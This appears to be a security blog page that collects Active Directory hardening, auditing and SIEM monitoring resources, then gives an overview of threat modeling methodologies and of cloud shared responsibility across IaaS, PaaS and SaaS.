Finally in terms of long read best practices articles, “The Ultimate Guide to Active Directory Best Practices” from DNSstuff. Like the previous two articles, this covers all important steps to secure your Active Directory.

Domain trusts are an important part of Active Directory security which most not be ignored. Here are some useful articles to understand domain trusts and ensure proper security processes are followed.

Sven also mentions the importance of securely setting up domain trusts. Along with this, he mentions upgrading DC’s to at least 2016. See this article which details the process of upgrading your DC’s to 2016 along with understanding functional levels. Also see the second comment which details further tips to securely use and set up your domain controllers.

Even though Active Directory is the main focus, ensure you do not forget about any *nix systems connected to your active directories. Dependent on the connected systems, ensure they are also configured securely using best practices.

The main point I would like to concentrate on is securing privileged access. Incorrectly setup access is one of the main causes of issues and the article provided by Nathan is great to resolve these. Check the article regarding securing privileged access out here. Also don’t forget to checkout PingCastle and Bloodhound tools.


Once you believe you have followed the best practices and hardening, the next step is auditing your environment to see where your Active Directory is still vulnerable.

You should use tools such as BloodHound and PingCastle to audit your Active Directory environment.

Lets start with BloodHound, this article from ZephrFish details well what BloodHound is, what it is used for; and how to use it.

Also mentioned is PingCastle. This is a similar tool which can also be used to audit Active Directory environments. Read more about PingCastle here and learn how to use the tool here.

These tools will allow you to find the existing issues in your environment. Take these issues and go back to the start of this post and see the best practices guide to resolve them. Once you are happy that your Active Directory is set up securely, the next step is monitoring rules to detect when malicious actors are attempting to attack your environment.


Once your Active Directory environment has been set up securely and audited, the next step is setting up monitoring rules using a SIEM. To learn more about SIEM, check out my “Learn SIEM for free” article.

As always, there are a large amount of rules in the Sigma repository which we can use to monitor Active Directory. The rules can be found in this directory. Please check the log source > definition under each rule which details the audit / log requirements for each rule.

There were also a couple useful comments regarding detection rules.

UltimateWindowsSecurity have a fantastic list of Windows Security Event’s. They have lots of useful information around WSEL and examples which help you understand them better. Larry is also working on a list of rules which you can check out here.

Sysmon allows for a much more detailed monitoring of events and should always be deployed on domain controllers. See the guide from Microsoft here which explains what Sysmon is, what it can be used for and how to set it up. Once setup, Sysmon logs can be sent to a central SIEM for more accurate monitoring of events. The SIGMA repository above has some rules which require Sysmon. For a more in depth look into Sysmon, check out this guide from Varonis.


At this point you will now have your Active Directory set up securely, audited and well monitored. I hope you have found this article useful and learned something from it. I’d like to thank everyone again who replied to the thread with useful resources, points and articles of their own.

Threat Modeling


What Is Threat Modeling?

Threat modeling is a proactive approach to identifying entry points to enumerate threats and building security measures to prevent security breaches in applications and computer and network systems. It’s an engineering technique you can use to help you identify threats, attacks, vulnerabilities, and countermeasures that could affect your application and systems. You can use threat modeling to shape your application’s and system’s design and improve security.

Threat modeling provides a good foundation for the specification of security requirements during application development. When applied during the early phases of software development, threat modeling empowers developers in several ways. These range from verifying application architecture, identifying and evaluating threats, designing countermeasures, to penetration testing based on a threat model. There is however paucity of established techniques and tools for threat modeling and analysis.

What Most Threat Models Include

Due to the uniqueness in nature, most threat models do not look the same but generally include the following basics:

  • A description of the threat
  • A list of assumptions regarding the function of the software or organization that can be reviewed in the future
  • Actions for each vulnerability
  • How to review and verify the vulnerabilities are being watched and are secure

Why is threat modeling necessary?

As organizations become more digital and cloud-based, IT systems face increased risk and vulnerability. Growing use of mobile and Internet of Things (IoT) devices also expands the threat landscape. And while hacking and distributed-denial-of-service (DDoS) attacks repeatedly make headlines, threats can also come from within–from employees trying to steal or manipulate data, for example.

Smaller enterprises are not immune to attacks either–in fact they may be more at risk because they don’t have adequate cybersecurity measures in place. Malicious hackers and other bad actors make risk assessments of their own and look for easy targets.

Threat Modeling Methodologies

OCTAVE (Practice Focused)
The Operationally Critical Threat, Asset, and Vulnerability Evaluation methodology[1] was one of the first created specifically for cybersecurity threat modeling. Developed at Carnegie Mellon University’s Software Engineering Institute (SEI) in collaboration with CERT, OCTAVE threat modeling methodology is heavy-weighted and focused on assessing organizational (non-technical) risks that may result from breached data assets.

Using this threat modeling methodology, an organization’s information assets are identified and the datasets they contain receive attributes based on the type of data stored. The intent is to eliminate confusion about the scope of a threat model and reduce excessive documentation for assets that are either poorly defined or are outside the purview of the project.

Though OCTAVE threat modeling provides a robust, asset-centric view, and organizational risk awareness, the documentation can become voluminous. OCTAVE lacks scalability – as technological systems add users, applications, and functionality, a manual process can quickly become unmanageable.

This method is most useful when creating a risk-aware corporate culture. The method is highly customizable to an organization’s specific security objectives and risk environment.

Trike Threat Modeling (Acceptable Risk Focused)
Trike threat modeling is a unique, open source threat modeling process focused on satisfying the security auditing process from a cyber risk management perspective.[2] It provides a risk-based approach with unique implementation, and risk modeling process. The foundation of the Trike threat modeling methodology is a “requirements model.” The requirements model ensures the assigned level of risk for each asset is “acceptable” to the various stakeholders.

With the requirements model in place, the next step in Trike threat modeling is to create a data flow diagram (DFD). System engineers created data flow diagrams in the 1970s to communicate how a system moves, stores and manipulates data. Traditionally they contained only four elements: data stores, processes, data flows, and interactors.

The concept of trust boundaries was added in the early 2000s to adopt data flow diagrams to threat modeling. In the Trike threat modeling methodology, DFDs are used to illustrate data flow in an implementation model and the actions users can perform in within a system state.

The implementation model is then analyzed to produce a Trike threat model. As threats are enumerated, appropriate risk values are assigned to them from which the user then creates attack graphs. Users then assign mitigating controls as required to address prioritized threats and the associated risks. Finally, users develop a risk model from the completed threat model based on assets, roles, actions and threat exposure.

However, because Trike threat modeling requires a person to hold a view of the entire system to conduct an attack surface analysis, it can be challenging to scale to larger systems.

P.A.S.T.A. Threat Modeling (Attacker Focused)
The Process for Attack Simulation and Threat Analysis is a relatively new application threat modeling methodology.[3] PASTA threat modeling provides a seven-step process for risk analysis which is platform insensitive. The goal of the PASTA methodology is to align business objectives with technical requirements while taking into account business impact analysis and compliance requirements. The output provides threat management, enumeration, and scoring.

The PASTA threat modeling methodology combines an attacker-centric perspective on potential threats with risk and impact analysis. The outputs are asset-centric. Also, the risk and business impact analysis of the method elevates threat modeling from a “software development only” exercise to a strategic business exercise by involving key decision makers in the process.

PASTA threat modeling works best for organizations that wish to align threat modeling with strategic objectives because it incorporates business impact analysis as an integral part of the process and expands cybersecurity responsibilities beyond the IT department.

This alignment can sometimes be a weakness of the PASTA threat modeling methodologies. Depending on the technological literacy of key stakeholders throughout the organization, adopting the PASTA methodology can require many additional hours of training and education.

STRIDE Threat Modeling (Developer Focused)
STRIDE stands for Spoofing Tampering Repudiation Information Message Disclosure Denial of Service and Elevation of Privilege. Microsoft’s threat modeling methodology – commonly referred to as STRIDE – aligns with their Trustworthy Computing directive of January 2002.[4] The primary focus of that directive is to help ensure that Microsoft’s Windows software developers think about security during the design phase.

The STRIDE threat modeling goal is to get an application to meet the security properties of Confidentiality, Integrity, and Availability (CIA), along with Authorization, Authentication, and Non-Repudiation. Once the security subject matter experts construct the data flow diagram-based threat model, system engineers or other subject matter experts check the application against the STRIDE threat model classification scheme.

This methodology is both well documented and well known owing to Microsoft’s significant influence in the software industry and their offering of Microsoft TMT.

VAST Threat Modeling (Enterprise Focused)
The Visual, Agile, and Simple Threat modeling (VAST) methodology was conceived after reviewing the shortcomings and implementation challenges inherent in the other threat modeling methodologies. The founding principle is that, in order to be effective, threat modeling must scale across the infrastructure and entire DevOps portfolio, integrate seamlessly into an Agile environment and provide actionable, accurate, and consistent outputs for developers, security teams, and senior executives alike.

A fundamental difference of the VAST threat modeling methodology‍ is its practical approach. Recognizing the security concerns of development teams are distinct from those of an infrastructure team, this methodology calls for two types of threat models.

Why you should Threat Model?

Threat Modeling gives a complete picture of the threats and possible attack paths. These attack paths can subsequently be used for instance to create efficient test scenarios, design adjustments or to define additional mitigating measures. Next to the result, the threat modeling workshop is a great way to raise security awareness and collaboration.

This allows you to execute concrete next steps in improving security.

Cloud shared responsibility


While taking the use of the cloud, we always overlook the issue of security and assume the cloud provider will for sure handle that. However, it is important to understand the security responsibility does not solely lie with the cloud provider. Security is a shared responsibility when using the cloud.

Below I try to outline the different responsibilities in securing the cloud for each of the stakeholders

Infrastructure-as-a-Service (IaaS)

Designed to provide the highest degree of flexibility and management control to customers, IaaS services also place more security responsibilities on customers. Let’s use Amazon Elastic Compute Cloud (Amazon EC2) as an example.

When customers deploy an instance of Amazon EC2, the customer is the one who manages the guest operating system, any applications they install on these instances and the configuration of provided firewalls on these instances. They are also responsible for overseeing data, classifying assets, and implementing the proper permissions for identity and access management.

While IaaS customers retain a lot of control, they can lean on CSPs to manage security from a physical, infrastructure, network, and virtualization standpoint.

Platform-as-a-Service (PaaS)

In PaaS, more of the heavy lifting is passed over to CSPs. While customers focus on deploying and managing applications (as well as managing data, assets, and permissions), CSPs take control of operating the underlying infrastructure, including guest operating systems.

From an efficiency standpoint, PaaS offers clear benefits. Without having to worry about patching or other updates to operating systems, security and IT teams recoup time that can be allocated to other pressing matters.

Software-as-a-Service (SaaS)

Of the three deployment options, SaaS places the most responsibility on the CSP. With the CSP managing the entire infrastructure as well as the applications, customers are only responsible for managing data, as well as user access/identity permissions. In other words, the service provider will manage and maintain the piece of software—customers just need to decide how they want to use it.


× Need my services?